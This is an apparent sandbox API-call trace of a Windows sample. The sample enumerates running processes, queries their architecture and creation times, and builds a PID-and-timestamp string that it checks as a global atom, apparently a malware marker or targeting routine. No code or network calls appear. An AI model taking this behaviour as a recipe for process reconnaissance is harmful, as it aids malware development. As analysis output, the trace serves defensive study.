	[0072.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0072.227] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.227] CloseHandle (hObject=0x224) returned 1
	[0072.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x728a38, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0072.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0072.227] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.227] CloseHandle (hObject=0x224) returned 1
	[0072.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0072.228] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.228] CloseHandle (hObject=0x224) returned 1
	[0072.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0072.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0072.228] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.228] CloseHandle (hObject=0x224) returned 1
	[0072.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0072.228] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.228] CloseHandle (hObject=0x224) returned 1
	[0072.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0072.228] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.228] CloseHandle (hObject=0x224) returned 1
	[0072.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x7287f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0072.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0072.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0072.229] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.229] CloseHandle (hObject=0x224) returned 1
	[0072.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0072.229] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.229] CloseHandle (hObject=0x224) returned 1
	[0072.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dc60, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0072.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0072.229] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.229] CloseHandle (hObject=0x224) returned 1
	[0072.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x7287f8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0072.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0072.229] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.229] CloseHandle (hObject=0x224) returned 1
	[0072.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72e8b0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0072.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0072.230] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.230] CloseHandle (hObject=0x224) returned 1
	[0072.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x728958, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0072.230] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.230] CloseHandle (hObject=0x224) returned 1
	[0072.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0072.230] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.230] CloseHandle (hObject=0x224) returned 1
	[0072.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0072.230] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.230] CloseHandle (hObject=0x224) returned 1
	[0072.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x7287f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0072.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0072.231] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.231] CloseHandle (hObject=0x224) returned 1
	[0072.231] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0072.231] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.231] CloseHandle (hObject=0x224) returned 1
	[0072.231] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0072.231] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.231] CloseHandle (hObject=0x224) returned 1
	[0072.231] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x772158, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0072.231] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.231] CloseHandle (hObject=0x224) returned 1
	[0072.231] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72ea18, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0072.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0072.231] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.231] CloseHandle (hObject=0x224) returned 1
	[0072.231] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x772200, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0072.232] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.232] CloseHandle (hObject=0x224) returned 1
	[0072.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x772170, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0072.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0072.232] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.232] CloseHandle (hObject=0x224) returned 1
	[0072.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x7287f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0072.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0072.232] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.232] CloseHandle (hObject=0x224) returned 1
	[0072.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0072.232] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.232] CloseHandle (hObject=0x224) returned 1
	[0072.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x728858, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0072.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0072.232] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.232] CloseHandle (hObject=0x224) returned 1
	[0072.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72e888, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0072.233] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0072.233] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.233] CloseHandle (hObject=0x224) returned 1
	[0072.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72ea18, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0072.233] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0072.233] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.233] CloseHandle (hObject=0x224) returned 1
	[0072.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x772200, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.233] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0072.233] GetLastError () returned 0x5
	[0072.233] GetLastError () returned 0x5
	[0072.233] GetLastError () returned 0x5
	[0072.233] GetLastError () returned 0x5
	[0072.233] GetLastError () returned 0x5
	[0072.233] GetLastError () returned 0x5
	[0072.233] GetLastError () returned 0x5
	[0072.233] GetLastError () returned 0x5
	[0072.233] GetLastError () returned 0x5
	[0072.233] GetLastError () returned 0x5
	[0072.233] GetLastError () returned 0x5
	[0072.233] GetLastError () returned 0x5
	[0072.233] GetLastError () returned 0x5
	[0072.233] GetLastError () returned 0x5
	[0072.233] GetLastError () returned 0x5
	[0072.233] GetLastError () returned 0x5
	[0072.233] GetLastError () returned 0x5
	[0072.233] GetLastError () returned 0x5
	[0072.233] GetLastError () returned 0x5
	[0072.233] GetLastError () returned 0x5
	[0072.233] GetLastError () returned 0x5
	[0072.233] GetLastError () returned 0x5
	[0072.233] GetLastError () returned 0x5
	[0072.233] GetLastError () returned 0x5
	[0072.233] GetLastError () returned 0x5
	[0072.233] GetLastError () returned 0x5
	[0072.233] GetLastError () returned 0x5
	[0072.233] GetLastError () returned 0x5
	[0072.233] GetLastError () returned 0x5
	[0072.233] GetLastError () returned 0x5
	[0072.233] GetLastError () returned 0x5
	[0072.234] GetLastError () returned 0x5
	[0072.234] GetLastError () returned 0x5
	[0072.234] GetLastError () returned 0x5
	[0072.234] GetLastError () returned 0x5
	[0072.234] GetLastError () returned 0x5
	[0072.234] GetLastError () returned 0x5
	[0072.234] GetLastError () returned 0x5
	[0072.234] GetLastError () returned 0x5
	[0072.234] GetLastError () returned 0x5
	[0072.234] GetLastError () returned 0x5
	[0072.234] GetLastError () returned 0x5
	[0072.234] GetLastError () returned 0x5
	[0072.234] GetLastError () returned 0x5
	[0072.234] GetLastError () returned 0x5
	[0072.234] GetLastError () returned 0x5
	[0072.234] GetLastError () returned 0x5
	[0072.234] GetLastError () returned 0x5
	[0072.234] GetLastError () returned 0x5
	[0072.234] GetLastError () returned 0x5
	[0072.234] GetLastError () returned 0x5
	[0072.234] GetLastError () returned 0x5
	[0072.234] GetLastError () returned 0x5
	[0072.234] GetLastError () returned 0x5
	[0072.234] GetLastError () returned 0x5
	[0072.234] GetLastError () returned 0x5
	[0072.234] GetLastError () returned 0x5
	[0072.234] GetLastError () returned 0x5
	[0072.234] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.234] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0072.234] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0072.234] GetLastError () returned 0x5
	[0072.234] GetLastError () returned 0x5
	[0072.234] GetLastError () returned 0x5
	[0072.234] GetLastError () returned 0x5
	[0072.234] GetLastError () returned 0x5
	[0072.234] GetLastError () returned 0x5
	[0072.234] GetLastError () returned 0x5
	[0072.234] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.235] GetLastError () returned 0x5
	[0072.236] GetLastError () returned 0x5
	[0072.236] GetLastError () returned 0x5
	[0072.236] GetLastError () returned 0x5
	[0072.236] GetLastError () returned 0x5
	[0072.236] GetLastError () returned 0x5
	[0072.236] GetLastError () returned 0x5
	[0072.236] GetLastError () returned 0x5
	[0072.236] GetLastError () returned 0x5
	[0072.236] GetLastError () returned 0x5
	[0072.236] GetLastError () returned 0x5
	[0072.236] GetLastError () returned 0x5
	[0072.236] GetLastError () returned 0x5
	[0072.236] GetLastError () returned 0x5
	[0072.236] GetLastError () returned 0x5
	[0072.236] GetLastError () returned 0x5
	[0072.236] GetLastError () returned 0x5
	[0072.236] GetLastError () returned 0x5
	[0072.236] GetLastError () returned 0x5
	[0072.236] GetLastError () returned 0x5
	[0072.236] GetLastError () returned 0x5
	[0072.236] GetLastError () returned 0x5
	[0072.236] GetLastError () returned 0x5
	[0072.236] GetLastError () returned 0x5
	[0072.236] GetLastError () returned 0x5
	[0072.236] GetLastError () returned 0x5
	[0072.236] GetLastError () returned 0x5
	[0072.236] GetLastError () returned 0x5
	[0072.236] GetLastError () returned 0x5
	[0072.236] GetLastError () returned 0x5
	[0072.236] GetLastError () returned 0x5
	[0072.236] GetLastError () returned 0x5
	[0072.236] GetLastError () returned 0x5
	[0072.236] GetLastError () returned 0x5
	[0072.236] GetLastError () returned 0x5
	[0072.236] GetLastError () returned 0x5
	[0072.236] GetLastError () returned 0x5
	[0072.236] GetLastError () returned 0x5
	[0072.236] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.236] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0072.236] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.237] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0072.237] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0072.237] CloseHandle (hObject=0x224) returned 1
	[0072.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0072.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0072.237] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.237] CloseHandle (hObject=0x224) returned 1
	[0072.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72e770, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0072.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0072.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0072.237] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.237] CloseHandle (hObject=0x224) returned 1
	[0072.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x772218, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0072.283] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16d68) returned 0xc0000004
	[0072.283] VirtualAlloc (lpAddress=0x0, dwSize=0x16e68, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0072.283] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16e68, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0072.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0072.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x7721b8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0072.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0072.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x7721a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0072.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0072.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x7721b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
